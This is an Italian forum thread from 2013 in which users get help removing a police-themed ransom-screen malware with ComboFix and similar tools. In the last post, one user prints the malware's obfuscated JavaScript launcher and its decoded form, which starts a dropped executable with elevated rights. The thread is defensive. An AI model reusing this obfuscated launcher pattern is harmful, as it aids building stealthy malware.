|
|
|
|
Strumenti |
08-01-2013, 13:35 | #101 |
Member
Iscritto dal: May 2010
Messaggi: 209
|
Ciao, son qui che ti leggo però non essendo un utente esperto di PC (anzi, tutt'altro) sto valutando la tua prima risposta (perché già la seconda è un po' più impegnativa...) però leggo che combofix non guarda in faccia a nessuno.
In altri termini ho letto che è un ultima spiaggia solamente per utenti esperti... |
08-01-2013, 13:38 | #102 |
Senior Member
Iscritto dal: May 2002
Città: Toscana
Messaggi: 3438
|
Se è il pc di casa, che lo usi solo Tu vai tranquillo, non fa del male, più di quello che già fa il tuo antivirus.
bye
__________________
ASUS TUF GAMING Z790-PRO WIFI (1424) + Intel i5@13600K + 32GB RAM DDR5 XMP3.0 6400MT/s CL32 FURY Renegade + SSD M2 990 PRO 1 TB + SSD M2 980 Pro 500GB + n°2 SSD 860 EVO 500GB + WD Blue 2 TB + MSI VENTUS 2X WHITE RTX 4060 8GB GDDR6 pci-ex4.0 + Scheda Audio Asus Xonar Phoebus Solo 7.1 |
08-01-2013, 13:41 | #103 |
Member
Iscritto dal: May 2010
Messaggi: 209
|
Vabbè, allora vado...
Ci sentiamo fra un po'... P.S. Eccomi con subito due intoppi: 1) malgrado abbia disabilitato avira (che ha adesso l'ombrellino chiuso...) combofix dice che trova lo scanner attivo e se continua può arrecare danni al PC; 2) non ho capito bene ma dice che vuole scaricare dei CD di Windows per il punto di ripristino... 3) ho ovviamente stoppato tutto la procedura Ultima modifica di Liku Fanele : 08-01-2013 alle 13:56. |
08-01-2013, 20:18 | #104 | |
Senior Member
Iscritto dal: May 2002
Città: Toscana
Messaggi: 3438
|
Quote:
2) Chiede di installare la Console di Ripristino, puoi anche installarla con XP male non fa, altrimenti gli dici di no. 3) Vai tranquillo, al massimo prende fuoco il pc. bye
__________________
ASUS TUF GAMING Z790-PRO WIFI (1424) + Intel i5@13600K + 32GB RAM DDR5 XMP3.0 6400MT/s CL32 FURY Renegade + SSD M2 990 PRO 1 TB + SSD M2 980 Pro 500GB + n°2 SSD 860 EVO 500GB + WD Blue 2 TB + MSI VENTUS 2X WHITE RTX 4060 8GB GDDR6 pci-ex4.0 + Scheda Audio Asus Xonar Phoebus Solo 7.1 |
|
09-01-2013, 09:28 | #105 | |
Member
Iscritto dal: May 2010
Messaggi: 209
|
Quote:
Per adesso il problema è risolto: bravi Grazie, a presto |
|
09-01-2013, 19:38 | #106 | |
Senior Member
Iscritto dal: Mar 2001
Messaggi: 1931
|
Quote:
Già rassegnato all'idea di dover formattare, fortunatamente avevo un'altro pc e con una breve ricerca su internet mi sono affidato alla soluzione offerta dal ComboFix... Alla fine, portatile disinfettato e qualche ora di sonno perse... |
|
10-01-2013, 16:19 | #107 |
Senior Member
Iscritto dal: Dec 2003
Città: MB
Messaggi: 4518
|
Mi autoquoto al post di Orione: la stessa cosa è successa a me ieri sera.
Stavo navigando con Firefox su siti assolutamente tranquilli (cercavo recensioni di un certo modello di gomme invernali), a un certo punto è sparito il dekstop, per una frazione di secondo ho visto MSE che cercava di dire qualcosa, ma poi è apparsa a tutto schermo la videata con l'avviso della polizia di stato (e relativa richiesta di 100 € per la sistemazione). La stessa cosa succedeva anche in modalità provvisoria, per cui non ho potuto adottare alcuni interventi consigliati su Internet. Allora sono partito con un liveCD e ho cancellato manualmente dalla cartella documenti un eseguibile sicuramente maligno, e da esecuzione automatica il link a questo eseguible. A quel punto il pc si è finalmente avviato, e ho fatto una passatona con MalwareBytes che ha trovato altri 3 elementi nocivi e li ha messi in quarantena. Ora mi chiedo: devo fare altro (es. Combofix) ? Cosa fa esattamente questo virus ? Ho sentito dire che può anche crittografare i files, rendendoli inutilizzabili. Ho letto in rete che anche gente con Avast e Avira ultimamente si è beccato questo virus. Vorrei levare al più presto MSE che ieri sera mi ha profondamente deluso, ma con cosa lo sostituisco ? |
10-01-2013, 17:44 | #108 | |
Bannato
Iscritto dal: Jan 2003
Città: Lucca
Messaggi: 9119
|
Quote:
Questa tecnologia prevede la creazione di un'apposita unità USB con cui effettuare il boot automatizzando di conseguenza tutto il processo di rimozione. Video che mostra come creare l'unità USB Video che mostra come utilizzarlo Se vi può servire, l'uso è davvero banale... NB: compatibile da XP a 7 Ultima modifica di nV 25 : 10-01-2013 alle 17:46. |
|
11-01-2013, 07:53 | #109 |
Senior Member
Iscritto dal: Dec 2003
Città: MB
Messaggi: 4518
|
Ieri sera ho cantato vittoria troppo presto.
Malwarebytes ha si eliminato un po' di roba, in particolare quella finestra del "ricatto" che impediva qualsiasi attività, ma poi usando un po' il pc questo era enormemente rallentato, Hijackthis si bloccava a 3/4 della scansione e rimaneva impallato, cliccando con il dx sul desktop usciva il menù contestuale dopo quasi 2 minuti d'orologio, Windows segnalava la mancanza di antivirus e firewall anche se presenti, ecc. ecc. Allora ho provato Combofix e questo dopo circa mezz'ora di lavoro mi ha eliminato un po' di roba. Vedo nel log che però ha trovato fra i files creati recentemente, anche questo: 2013-01-09 22:16 . 2013-01-10 05:51 3032 ----a-w- c:\documents and settings\All Users\Dati applicazioni\dsgsdgdsgdsgw.js Non mi piace tanto quel nome, non vorrà dire che qualcosa è rimasto ancora ? Adesso dopo la passata con Combofix il pc è molto più reattivo, ma sarà davvero finita ? Se postassi il log di Combofix, qualcuno me lo potrebbe controllare ? Grazie. |
11-01-2013, 09:37 | #110 |
Senior Member
Iscritto dal: May 2002
Città: Toscana
Messaggi: 3438
|
Postalo.
bye
__________________
ASUS TUF GAMING Z790-PRO WIFI (1424) + Intel i5@13600K + 32GB RAM DDR5 XMP3.0 6400MT/s CL32 FURY Renegade + SSD M2 990 PRO 1 TB + SSD M2 980 Pro 500GB + n°2 SSD 860 EVO 500GB + WD Blue 2 TB + MSI VENTUS 2X WHITE RTX 4060 8GB GDDR6 pci-ex4.0 + Scheda Audio Asus Xonar Phoebus Solo 7.1 |
12-01-2013, 14:24 | #111 |
Senior Member
Iscritto dal: Jan 2001
Messaggi: 3693
|
salve ragazzi,
un mio amico ha preso questo virus e ora tocca a me sistemare le rogne, sono riuscito in un modo o nell'altro a debellarlo, anche se non del tutto, ho cambiato cartella al file wdsgdgsdsgdsg.exe e ora ovviamente all'autoavvio non lo trova più e quindi non parte. poi ho fatto una scansione con avira e me lo rileva giustamente come minaccia e lo ho fatto mettere in quarantena assieme a altri 3-4 file che ha trovato. il problema dove sta ora? semplice il pc impiega tipo 30 minuti per accendersi e non mi capacito del motivo, che può essere? Pindol
__________________
Nel mercatino, concluso positivamente con: Cloale, xdominique, pannox, GhinghinO, alecine, @recidivo@, HI-Giona, Kevin34, Kinta, ToTo1706, alexburt1, dragonballfusion, Blackxx, Jas2000, albanomax, dav117, wolf82, Telcar |
12-01-2013, 16:19 | #112 |
Senior Member
Iscritto dal: Aug 2000
Messaggi: 393
|
Qualche servizio ancora attivo.. quindi ti consiglio di usare combofix, malwarebyte, virit e un bel ccleaner per pulire i temporanei; fatto questo il pc dovrebbe ritornare a riprendersi :-)
Inviato dal mio GT-I9300 con Tapatalk 2 |
12-01-2013, 22:20 | #113 | |
Senior Member
Iscritto dal: Dec 2003
Città: MB
Messaggi: 4518
|
Eccolo: logCombofix.txt
Grazie Quote:
Non avere fretta, fallo lavorare finche si riavvia il sistema e prosegue con le sue attività. |
|
16-01-2013, 00:10 | #114 |
Senior Member
Iscritto dal: May 2002
Città: Toscana
Messaggi: 3438
|
Ciao,
questo va cancellato (magari anche con "autoruns" se li rileva o il GMER): c:\documents and settings\All Users\Dati applicazioni\dsgsdgdsgdsgw.js Consiglio l'installazione di un firewall software come l'OnlineArmor che dovrebbe ribloccare il malware in questione. bye
__________________
ASUS TUF GAMING Z790-PRO WIFI (1424) + Intel i5@13600K + 32GB RAM DDR5 XMP3.0 6400MT/s CL32 FURY Renegade + SSD M2 990 PRO 1 TB + SSD M2 980 Pro 500GB + n°2 SSD 860 EVO 500GB + WD Blue 2 TB + MSI VENTUS 2X WHITE RTX 4060 8GB GDDR6 pci-ex4.0 + Scheda Audio Asus Xonar Phoebus Solo 7.1 |
17-01-2013, 18:26 | #115 |
Junior Member
Iscritto dal: Jan 2013
Messaggi: 2
|
Salve a tutti,
avevo aperto l'altro ieri il thread seguente riguardante una variante di questo virus: http://www.hwupgrade.it/forum/showthread.php?t=2538472 E' stato chiuso suggerendomi di venire qui; tuttavia avevo già letto per intero questo thread e, se ne avevo aperto un altro, è a causa di una anomalia che non riscontro in un nessun altro caso citato. Come potete leggere, non ho avuto problemi a debellare il virus; tuttavia la maggior parte dei miei file (compresi quelli contenuti in una memoria esterna) sono diventati illeggibili. E non intendo criptati, ma proprio illeggibili: infatti non hanno cambiato estensione, nome o dimensione. Inoltre tutti i decrypter citati non hanno sortito effetto.. Nessun recupero è stato possibile nemmeno con svariati software di recupero. Volevo sapere se avevate esperienza di altri casi simili o suggerimenti per "riparare" file. Grazie |
30-01-2013, 08:17 | #116 |
Senior Member
Iscritto dal: Jul 2006
Città: Alessandria
Messaggi: 2778
|
mi sono beccat o2 volte in un meso questa bestiaccia . . . e non ho nemmeno capito come. . . .
Comunque dato che mi funge solo la provvisoria con prompt ho usato combofix e in 5 min ho risolto tutto. Al seconndo giro, brutta sorpresa, mi appare un messaggio tipo: La data é 30-01-2013, la versione di comboxif é scaduta, cancellare e scaricare una nuova versione. E logicamente sul sito il download non é temporaneamente disponibile. Chiedo disperatamente aiuto per debellare il virus e consigli per prevenire nuove infezioni attualmentemi difendo con Avira e Malawarebyte.
__________________
AsRock Fatal1ty H97 Killer - Intel I7 4790 - 2x8gb DDR3 Crucial Ballistix Tactical 1600 cl8 - MSI GTX 1660 - Creative Sound Blaster Audigy 2 - SSD Samsung 840 EVO 250gb - HHD Toshiba 2000GB - Cooler Master N400 - Corsair CX600M - Samsung SyncMaster245B D3: abe77#2296 |
30-01-2013, 08:52 | #117 |
Senior Member
Iscritto dal: Dec 2003
Città: MB
Messaggi: 4518
|
E' vero, Combofix non risulta scaricabile al momento.
Una domanda stupida: hai provato magari da Bios a retrocedere un po' la data del sistema ? Ho letto cmq che anche HitmanPro dovrebbe risolvere, lo hai provato ? Ultima modifica di max60 : 30-01-2013 alle 08:54. |
30-01-2013, 11:46 | #118 | |
Senior Member
Iscritto dal: Mar 2001
Messaggi: 1931
|
Quote:
P.s. Io avevo beccato questo virus qualche settimana fa, risolto positivamente con il combofix. Ieri però ho fatto una scansione completa con l'AVG e mi ha trovato ancora qualche traccia in c:\documents and settings\All Users\Dati applicazioni\dsgsdgdsgdsgw.js, spostato in quarantena e poi definitivamente eliminato... Spero adesso che l'AVG riconosca questo virus prima di far nuovamente danni... |
|
30-01-2013, 12:32 | #119 |
Senior Member
Iscritto dal: Jul 2006
Città: Alessandria
Messaggi: 2778
|
sono riuscito a riavviare!
sto scansionando, ma dato che non prendevo virus da anni e questo in 15 gg mi ha fregato 2 volte, non sto tanto tranquillo. ho win7 e uso internet explorer Come difese ho avira e malawarebyte Il firewall di windows mi dice che o é disattivato o non impostato correttamente.. . cosa dovrei fare per pararmi il . . . . Grazie!
__________________
AsRock Fatal1ty H97 Killer - Intel I7 4790 - 2x8gb DDR3 Crucial Ballistix Tactical 1600 cl8 - MSI GTX 1660 - Creative Sound Blaster Audigy 2 - SSD Samsung 840 EVO 250gb - HHD Toshiba 2000GB - Cooler Master N400 - Corsair CX600M - Samsung SyncMaster245B D3: abe77#2296 |
30-01-2013, 13:32 | #120 | |||
Senior Member
Iscritto dal: Dec 2003
Città: MB
Messaggi: 4518
|
Quote:
Se fosse così le trial anche di software costosi avrebbero vita infinita ... Quote:
Nel mio caso (allora avevo MSE), l'antivirus di Microsoft non se n'era neanche accorto. Me l'ha trovato Combofix e l'ho tolto dalla cartella documenti. Comunque l'ho salvato e l'ho aperto con blocco note, tanto è un javascript. E' interessante quello che c'è dentro. Il contenuto è questo: Codice:
var w = String.fromCharCode(83)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(108)+String.fromCharCode(108)+String.fromCharCode(46)+String.fromCharCode(65)+String.fromCharCode(112)+String.fromCharCode(112)+String.fromCharCode(108)+String.fromCharCode(105)+String.fromCharCode(99)+String.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(105)+String.fromCharCode(111)+String.fromCharCode(110); var a = String.fromCharCode(67)+String.fromCharCode(58)+String.fromCharCode(92)+String.fromCharCode(92)+String.fromCharCode(87)+String.fromCharCode(73)+String.fromCharCode(78)+String.fromCharCode(68)+String.fromCharCode(79)+String.fromCharCode(87)+String.fromCharCode(83)+String.fromCharCode(92)+String.fromCharCode(92)+String.fromCharCode(115)+String.fromCharCode(121)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(109)+String.fromCharCode(51)+String.fromCharCode(50)+String.fromCharCode(92)+String.fromCharCode(92)+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(108)+String.fromCharCode(108)+String.fromCharCode(51)+String.fromCharCode(50)+String.fromCharCode(46)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(101)+String.fromCharCode(32); var s = String.fromCharCode(99)+String.fromCharCode(58)+String.fromCharCode(92)+String.fromCharCode(100)+String.fromCharCode(111)+String.fromCharCode(99)+String.fromCharCode(117)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(126)+String.fromCharCode(49)+String.fromCharCode(92)+String.fromCharCode(103)+String.fromCharCode(105)+String.fromCharCode(111)+String.fromCharCode(109)+String.fromCharCode(97)+String.fromCharCode(120)+String.fromCharCode(126)+String.fromCharCode(49)+String.fromCharCode(92)+String.fromCharCode(119)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(100)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(100)+String.fromCharCode(103)+String.fromCharCode(100)+String.fromCharCode(115)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(100)+String.fromCharCode(46)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(101)+String.fromCharCode(32)+String.fromCharCode(44)+String.fromCharCode(72)+String.fromCharCode(49)+String.fromCharCode(78)+String.fromCharCode(51); var m = String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(110)+String.fromCharCode(97)+String.fromCharCode(115); var activex = new ActiveXObject(w); activex.ShellExecute(a,s,"",m,1); WScript.Sleep(2000); var r = String.fromCharCode(87)+String.fromCharCode(83)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(46)+String.fromCharCode(83)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(108)+String.fromCharCode(108); var WSHShell = WScript.CreateObject(r); WSHShell.Run(a+s); Ma incorporando il codice in una pagina html e facendo il document.write delle variabili che usa, la cosa assume un significato più chiaro e il codice diventa questo: Codice:
var w = Shell.Application; var a = C:\\WINDOWS\\system32\\rundll32.exe; var s = c:\docume~1\giomax~1\wgsdgsdgdsgsd.exe ,H1N3; var m = runas; var activex = new ActiveXObject(w); activex.ShellExecute(a,s,"",m,1); WScript.Sleep(2000); var r = WScript.Shell; var WSHShell = WScript.CreateObject(r); WSHShell.Run(a+s); Il tutto credo che venisse attivato da un collegamento presente in esecuzione automatica. Quello l'ho proprio cancellato e non me lo sono salvato. Quote:
magari hai ancora qualche porcata in giro. Provato HitmanPro se ti scova qualcosa ? |
|||
Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 00:08.